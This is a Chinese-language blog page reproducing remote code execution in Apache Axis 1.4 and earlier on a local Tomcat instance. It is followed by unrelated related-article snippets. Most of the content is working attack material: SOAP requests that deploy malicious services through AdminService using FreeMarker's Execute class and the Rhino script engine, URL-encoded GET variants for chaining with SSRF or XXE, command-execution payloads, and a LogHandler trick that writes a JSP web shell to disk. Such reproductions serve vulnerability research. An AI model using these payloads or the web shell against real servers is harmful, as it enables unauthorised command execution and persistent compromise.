Axis <=1.4 RCE 复现

1、环境搭建

在idea 上新建项目，然后用tomcat运行即可

2、漏洞复现

2、1 freemarker.template.utility.Execute

如果项目里面没有freemarker 就添加，这里添加的是 freemarker-2.3.30.jar

创建 freemarkerTest services ，返回Done processing 即表示创建成功，同时访问services页面也可以看到freemarkerTest services

POST /services/AdminService HTTP/1.1

Pragma: no-cache

Cache-Control: no-cache

sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90"

sec-ch-ua-mobile: ?0

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Sec-Fetch-Site: same-origin

Sec-Fetch-Mode: navigate

Sec-Fetch-User: ?1

Sec-Fetch-Dest: document

Referer: http://localhost:8083/services

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Connection: close

SOAPAction:

Content-Type: text/xml;charset=UTF-8

Host: localhost:8083

Content-Length: 632

<?xml version="1.0" encoding="UTF-8"?>

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">

  <soapenv:Body>

    <deployment xmlns="http://xml.apache.org/axis/wsdd/"

                xmlns:java="http://xml.apache.org/axis/wsdd/providers/java">

       <service name="freemarkerTest" provider="java:RPC">

		<parameter name="className" value="freemarker.template.utility.Execute"/>

		<parameter name="allowedMethods" value="*"/>

       </service>

    </deployment>

  </soapenv:Body>

</soapenv:Envelope>

GET 创建service ，配合ssrf xxe 使用（当 "enableRemoteAdmin" 为 "false" ）时

!--><deployment xmlns="http://xml.apache.org/axis/wsdd/"

                xmlns:java="http://xml.apache.org/axis/wsdd/providers/java">

       <service name="freemarkerTest" provider="java:RPC">

		<parameter name="className" value="freemarker.template.utility.Execute"/>

		<parameter name="allowedMethods" value="*"/>

       </service>

    </deployment

进行urlencode

%21%2d%2d%3e%3c%64%65%70%6c%6f%79%6d%65%6e%74%20%78%6d%6c%6e%73%3d%22%68%74%74%70%3a%2f%2f%78%6d%6c%2e%61%70%61%63%68%65%2e%6f%72%67%2f%61%78%69%73%2f%77%73%64%64%2f%22%0a%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%78%6d%6c%6e%73%3a%6a%61%76%61%3d%22%68%74%74%70%3a%2f%2f%78%6d%6c%2e%61%70%61%63%68%65%2e%6f%72%67%2f%61%78%69%73%2f%77%73%64%64%2f%70%72%6f%76%69%64%65%72%73%2f%6a%61%76%61%22%3e%0a%20%20%20%20%20%20%20%3c%73%65%72%76%69%63%65%20%6e%61%6d%65%3d%22%66%72%65%65%6d%61%72%6b%65%72%54%65%73%74%22%20%70%72%6f%76%69%64%65%72%3d%22%6a%61%76%61%3a%52%50%43%22%3e%0a%09%09%3c%70%61%72%61%6d%65%74%65%72%20%6e%61%6d%65%3d%22%63%6c%61%73%73%4e%61%6d%65%22%20%76%61%6c%75%65%3d%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%2f%3e%0a%09%09%3c%70%61%72%61%6d%65%74%65%72%20%6e%61%6d%65%3d%22%61%6c%6c%6f%77%65%64%4d%65%74%68%6f%64%73%22%20%76%61%6c%75%65%3d%22%2a%22%2f%3e%0a%20%20%20%20%20%20%20%3c%2f%73%65%72%76%69%63%65%3e%0a%20%20%20%20%3c%2f%64%65%70%6c%6f%79%6d%65%6e%74

http://localhost:8083/services/AdminService?method= 将urlencode之后的值放在此处

执行命令

POST /services/freemarkerTest HTTP/1.1

sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90"

sec-ch-ua-mobile: ?0

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Sec-Fetch-Site: same-origin

Sec-Fetch-Mode: navigate

Sec-Fetch-User: ?1

Sec-Fetch-Dest: document

Referer: http://localhost:8083/services

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Connection: close

SOAPAction:

Content-Type: text/xml;charset=UTF-8

Host: localhost:8083

Content-Length: 671

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">

  <soapenv:Body>

    <exec soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">

      <arg0 href="#id0"/>

    </exec>

    <multiRef id="id0" soapenc:root="0" soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" soapenc:arrayType="xsd:anyType[1]" xsi:type="soapenc:Array" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">

      <multiRef xsi:type="soapenc:string">cmd.exe /c echo 111111</multiRef>

    </multiRef>

  </soapenv:Body>

</soapenv:Envelope>

或

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:util="http://utility.template.freemarker" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">

   <soapenv:Header/>

   <soapenv:Body>

      <util:exec soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">

         <arguments>

            <string xsi:type="soapenc:string">cmd.exe /c whoami</string>

         </arguments>

      </util:exec>

   </soapenv:Body>

</soapenv:Envelope>

卸载service

POST /services/AdminService HTTP/1.1

Pragma: no-cache

Cache-Control: no-cache

sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90"

sec-ch-ua-mobile: ?0

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Sec-Fetch-Site: same-origin

Sec-Fetch-Mode: navigate

Sec-Fetch-User: ?1

Sec-Fetch-Dest: document

Referer: http://localhost:8083/services

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Connection: close

SOAPAction:

Content-Type: text/xml;charset=UTF-8

Host: localhost:8083

Content-Length: 395

<?xml version="1.0" encoding="UTF-8"?>

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">

  <soapenv:Body>

    <undeployment xmlns="http://xml.apache.org/axis/wsdd/">

      <service name="freemarkerTest"/>

    </undeployment>

  </soapenv:Body>

</soapenv:Envelope>

http://localhost:8083/services/AdminService?method=%21%2d%2d%3e%3c%75%6e%64%65%70%6c%6f%79%6d%65%6e%74%20%78%6d%6c%6e%73%3d%22%68%74%74%70%3a%2f%2f%78%6d%6c%2e%61%70%61%63%68%65%2e%6f%72%67%2f%61%78%69%73%2f%77%73%64%64%2f%22%3e%0a%20%20%20%20%20%20%3c%73%65%72%76%69%63%65%20%6e%61%6d%65%3d%22%66%72%65%65%6d%61%72%6b%65%72%54%65%73%74%22%2f%3e%0a%20%20%20%20%3c%2f%75%6e%64%65%70%6c%6f%79%6d%65%6e%74

2、2 com.sun.script.javascript.RhinoScriptEngine

jdk <= 1.7 可用本地复现用的 jdk 1.7.0_79

创建services

POST /services/AdminService HTTP/1.1

Pragma: no-cache

Cache-Control: no-cache

sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90"

sec-ch-ua-mobile: ?0

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Sec-Fetch-Site: same-origin

Sec-Fetch-Mode: navigate

Sec-Fetch-User: ?1

Sec-Fetch-Dest: document

Referer: http://localhost:8083/services

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Connection: close

SOAPAction:

Content-Type: text/xml;charset=UTF-8

Host: localhost:8083

Content-Length: 1074

<?xml version="1.0" encoding="UTF-8"?>

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">

  <soapenv:Body>

    <deployment xmlns="http://xml.apache.org/axis/wsdd/"

                xmlns:java="http://xml.apache.org/axis/wsdd/providers/java">

       <service name="RhinoScriptEngineServiceTest" provider="java:RPC">

          <parameter name="className" value="com.sun.script.javascript.RhinoScriptEngine" />

          <parameter name="allowedMethods" value="eval" />

          <typeMapping deserializer="org.apache.axis.encoding.ser.BeanDeserializerFactory"

                     type="java:javax.script.SimpleScriptContext"

                     qname="ns:SimpleScriptContext"

                     serializer="org.apache.axis.encoding.ser.BeanSerializerFactory"

                     xmlns:ns="urn:beanservice" regenerateElement="false">

          </typeMapping>

      </service>

    </deployment>

  </soapenv:Body>

</soapenv:Envelope>

GET 创建service ，配合ssrf xxe 使用（当 "enableRemoteAdmin" 为 "false" ）时

!--><deployment xmlns="http://xml.apache.org/axis/wsdd/"

                xmlns:java="http://xml.apache.org/axis/wsdd/providers/java">

       <service name="RhinoScriptEngineServiceTest" provider="java:RPC">

          <parameter name="className" value="com.sun.script.javascript.RhinoScriptEngine" />

          <parameter name="allowedMethods" value="eval" />

          <typeMapping deserializer="org.apache.axis.encoding.ser.BeanDeserializerFactory"

                     type="java:javax.script.SimpleScriptContext"

                     qname="ns:SimpleScriptContext"

                     serializer="org.apache.axis.encoding.ser.BeanSerializerFactory"

                     xmlns:ns="urn:beanservice" regenerateElement="false">

          </typeMapping>

      </service>

    </deployment

进行urlencode

http://localhost:8083/services/AdminService?method=%21%2d%2d%3e%3c%64%65%70%6c%6f%79%6d%65%6e%74%20%78%6d%6c%6e%73%3d%22%68%74%74%70%3a%2f%2f%78%6d%6c%2e%61%70%61%63%68%65%2e%6f%72%67%2f%61%78%69%73%2f%77%73%64%64%2f%22%0a%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%78%6d%6c%6e%73%3a%6a%61%76%61%3d%22%68%74%74%70%3a%2f%2f%78%6d%6c%2e%61%70%61%63%68%65%2e%6f%72%67%2f%61%78%69%73%2f%77%73%64%64%2f%70%72%6f%76%69%64%65%72%73%2f%6a%61%76%61%22%3e%0a%20%20%20%20%20%20%20%3c%73%65%72%76%69%63%65%20%6e%61%6d%65%3d%22%52%68%69%6e%6f%53%63%72%69%70%74%45%6e%67%69%6e%65%53%65%72%76%69%63%65%54%65%73%74%22%20%70%72%6f%76%69%64%65%72%3d%22%6a%61%76%61%3a%52%50%43%22%3e%0a%20%20%20%20%20%20%20%20%20%20%3c%70%61%72%61%6d%65%74%65%72%20%6e%61%6d%65%3d%22%63%6c%61%73%73%4e%61%6d%65%22%20%76%61%6c%75%65%3d%22%63%6f%6d%2e%73%75%6e%2e%73%63%72%69%70%74%2e%6a%61%76%61%73%63%72%69%70%74%2e%52%68%69%6e%6f%53%63%72%69%70%74%45%6e%67%69%6e%65%22%20%2f%3e%0a%20%20%20%20%20%20%20%20%20%20%3c%70%61%72%61%6d%65%74%65%72%20%6e%61%6d%65%3d%22%61%6c%6c%6f%77%65%64%4d%65%74%68%6f%64%73%22%20%76%61%6c%75%65%3d%22%65%76%61%6c%22%20%2f%3e%0a%20%20%20%20%20%20%20%20%20%20%3c%74%79%70%65%4d%61%70%70%69%6e%67%20%64%65%73%65%72%69%61%6c%69%7a%65%72%3d%22%6f%72%67%2e%61%70%61%63%68%65%2e%61%78%69%73%2e%65%6e%63%6f%64%69%6e%67%2e%73%65%72%2e%42%65%61%6e%44%65%73%65%72%69%61%6c%69%7a%65%72%46%61%63%74%6f%72%79%22%0a%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%74%79%70%65%3d%22%6a%61%76%61%3a%6a%61%76%61%78%2e%73%63%72%69%70%74%2e%53%69%6d%70%6c%65%53%63%72%69%70%74%43%6f%6e%74%65%78%74%22%0a%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%71%6e%61%6d%65%3d%22%6e%73%3a%53%69%6d%70%6c%65%53%63%72%69%70%74%43%6f%6e%74%65%78%74%22%0a%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%73%65%72%69%61%6c%69%7a%65%72%3d%22%6f%72%67%2e%61%70%61%63%68%65%2e%61%78%69%73%2e%65%6e%63%6f%64%69%6e%67%2e%73%65%72%2e%42%65%61%6e%53%65%72%69%61%6c%69%7a%65%72%46%61%63%74%6f%72%79%22%0a%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%78%6d%6c%6e%73%3a%6e%73%3d%22%75%72%6e%3a%62%65%61%6e%73%65%72%76%69%63%65%22%20%72%65%67%65%6e%65%72%61%74%65%45%6c%65%6d%65%6e%74%3d%22%66%61%6c%73%65%22%3e%0a%20%20%20%20%20%20%20%20%20%20%3c%2f%74%79%70%65%4d%61%70%70%69%6e%67%3e%0a%20%20%20%20%20%20%3c%2f%73%65%72%76%69%63%65%3e%0a%20%20%20%20%3c%2f%64%65%70%6c%6f%79%6d%65%6e%74

执行命令

<?xml version='1.0' encoding='UTF-8'?>

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:jav="http://javascript.script.sun.com">

  <soapenv:Body>

    <eval xmlns="http://localhost:8083/services/scriptEngine">

      <arg0 xmlns=""><![CDATA[function test(){var cmd1='c'; cmd1 += 'm';cmd1 += 'd';cmd1 += '.';cmd1 += 'e';   cmd1 += 'x';cmd1 += 'e';var cmd2 = '/'; cmd2 += 'c'; var pb = new java.lang.ProcessBuilder(cmd1,cmd2,'ver');var process = pb.start(); var ret = new java.util.Scanner(process.getInputStream()).useDelimiter('\\A').next();return ret;}test();]]>

      </arg0>

      <arg1 xmlns="" xsi:type="urn:SimpleScriptContext" xmlns:urn="urn:beanservice"></arg1>

    </eval>

  </soapenv:Body>

</soapenv:Envelope>

卸载service

<?xml version="1.0" encoding="UTF-8"?>

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">

  <soapenv:Body>

    <undeployment xmlns="http://xml.apache.org/axis/wsdd/">

      <service name="RhinoScriptEngineServiceTest"/>

    </undeployment>

  </soapenv:Body>

</soapenv:Envelope>

http://localhost:8083/services/AdminService?method=%21%2d%2d%3e%3c%75%6e%64%65%70%6c%6f%79%6d%65%6e%74%20%78%6d%6c%6e%73%3d%22%68%74%74%70%3a%2f%2f%78%6d%6c%2e%61%70%61%63%68%65%2e%6f%72%67%2f%61%78%69%73%2f%77%73%64%64%2f%22%3e%0a%20%20%20%20%20%20%3c%73%65%72%76%69%63%65%20%6e%61%6d%65%3d%22%52%68%69%6e%6f%53%63%72%69%70%74%45%6e%67%69%6e%65%53%65%72%76%69%63%65%54%65%73%74%22%2f%3e%0a%20%20%20%20%3c%2f%75%6e%64%65%70%6c%6f%79%6d%65%6e%74

2、3 写文件

创建service

<?xml version="1.0" encoding="UTF-8"?>

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">

  <soapenv:Body>

    <deployment xmlns="http://xml.apache.org/axis/wsdd/"

                xmlns:java="http://xml.apache.org/axis/wsdd/providers/java">

       <service name="writeFile2" provider="java:RPC">

		<requestFlow>

            <handler type="java:org.apache.axis.handlers.LogHandler" >

                <parameter name="LogHandler.fileName" value="F:/work/SpringStudy/out/artifacts/axis_rce_test_war_exploded/shell123.jsp" />

                <parameter name="LogHandler.writeToConsole" value="false" />

            </handler>

         </requestFlow>

          <parameter name="className" value="java.util.Random" />

          <parameter name="allowedMethods" value="*" />

       </service>

    </deployment>

  </soapenv:Body>

</soapenv:Envelope>

写文件

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:util="http://util.java">

   <soapenv:Header/>

   <soapenv:Body>

      <util:ints soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">

         <in0 xsi:type="xsd:int" xs:type="type:int" xmlns:xs="http://www.w3.org/2000/XMLSchema-instance"><![CDATA[

<%@page import="java.util.*,java.io.*"%><% if (request.getParameter("c") != null) { Process p = Runtime.getRuntime().exec(request.getParameter("c")); DataInputStream dis = new DataInputStream(p.getInputStream()); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); }; p.destroy(); }%>

]]></in0>

         <in1 xsi:type="xsd:int" xs:type="type:int" xmlns:xs="http://www.w3.org/2000/XMLSchema-instance">?</in1>

      </util:ints>

   </soapenv:Body>

</soapenv:Envelope>

参考

Axis <=1.4 RCE 复现的更多相关文章

应用Apache Axis进行Web Service开发
转自(http://tscjsj.blog.51cto.com/412451/84813) 一.概述 SOAP原意为Simple Object Access Protocol(简单对象访问协议),是一 ...
有理数的稠密性(The rational points are dense on the number axis.)
每一个实数都能用有理数去逼近到任意精确的程度,这就是有理数的稠密性.The rational points are dense on the number axis.
使用axis开发web service服务端
一.axis环境搭建 1.安装环境 JDK.Tomcat或Resin.eclipse等. 2.到 http://www.apache.org/dyn/closer.cgi/ws/axis/1_4下载A ...
AXIS最佳实践
前言: Axis是apache一个开源的webservice服务,需要web容器进行发布.本节主要用于介绍使用Axis开发webservice,包括服务端的创建.webservice的部署.客户端的调 ...
axis 理解
前言使用numpy sum(a,axis=0)的时候,对axis参数比较费解,和直觉不太一样,故此记录 b = np.arange(12).reshape(3,4) b array([[ 0, 1, ...
Axis 1 https(SSL) client 证书验证错误ValidatorException workaround
Axis 1.x 编写的client在测试https的webservice的时候, 由于client 代码建立SSL连接的时候没有对truststore进行设置,在与https部署的webservic ...
axis
http://www.cnblogs.com/liyanblog/archive/2011/11/29/2266942.html 报错: D:\ws\la\WSofSMNS\WebRoot\WEB-I ...
【知识积累】服务器端获取客户端的IP地址(当客户端调用由Axis开发的WebService)
一.前言由于项目中一个小的模块需要获取客户端的IP地址以保证安全调用webservice接口,项目中客户端使用C#编写,服务器端使用Java编写,服务器端与客户端采用Axis开发的WebServic ...
使用axis调用WebService服务端
由于项目中要调用其他公司的接口,研究了下axis调用webService这种方式,现将代码贴出,以备以后查阅: package com.xbq; import javax.xml.namespace. ...
MATLAB axis和axes的区别
axis中文为“轴”之意,在matlab中用于控制坐标轴的范围和样式(颜色等). axis([XMIN XMAX YMIN YMAX]) 设置当前所绘图像的x轴和y轴的范围.axis([XMIN XM ...

随机推荐

kivy八种布局方式学习
kivy八种布局:FloatLayout.BoxLayout.AnchorLayout.GridLayout.PageLayout.RelativeLayout.ScatterLayout.Stack ...
Yara规则学习
01 定义官网: YARA is a tool aimed at (but not limited to) helping malware researchers to identify and c ...
『Java』StringBuilder类使用方法
String类存在的问题 String类的底层是一个被final修饰的byte[],不能改变. 为了解决以上问题,可以使用java.lang.StringBuilder类. StringBuilder ...
Postman API 接口测试、Jenkin 持续集成测试
Postman 是一个创建和使用API的应用,Postman 对于Web开发者来说非常有用,Postman 带来的便利有很多,诸如: RESTFul接口测试不依赖其他端,进度不受影响测试脚本即文档, ...
【原创】Java内存攻击技术漫谈
前言 Java技术栈漏洞目前业已是web安全领域的主流战场,随着IPS.RASP等防御系统的更新迭代,Java攻防交战阵地已经从磁盘升级到了内存里面. 在今年7月份上海银针安全沙龙上,我分享了< ...
SQL 练习20
查询各科成绩前三名的记录 select a.sid,a.cid,a.score from sc a left join sc b on a.cid = b.cid and a.score<b.s ...
Arduino连接L298n驱动板驱动小车的电机
1.L298N介绍先来讲讲电机驱动,驱动一般使用L298N,L298N 是一种双H桥电机驱动芯片,其中每个H桥可以提供2A的电流,功率部分的供电电压范围是2.5-48v,逻辑部分5v供电,接受5vT ...
Windows下安装RocketMQ
目录前言环境具体操作下载环境变量配置启动关闭生产.消费实例 RocketMQ Console 前言项目中用到了延迟消息队列,记录下一win10下rocketmq的安装环境 win1 ...
docker部署minio
快速部署 docker run -p 9000:9000 --name myminio \ -e "MINIO_ACCESS_KEY=AKIAIOSFODNN7EXAMPLE" \ ...
Longhorn，企业级云原生容器分布式存储 - 支持 ReadWriteMany (RWX) 工作负载（实验性功能）
内容来源于官方 Longhorn 1.1.2 英文技术手册. 系列 Longhorn 是什么? Longhorn 企业级云原生容器分布式存储解决方案设计架构和概念 Longhorn 企业级云原生容器分 ...

Axis <=1.4 RCE 复现

1、环境搭建

2、漏洞复现

2、1 freemarker.template.utility.Execute

2、2 com.sun.script.javascript.RhinoScriptEngine

2、3 写文件

参考

Axis <=1.4 RCE 复现的更多相关文章

随机推荐

热门专题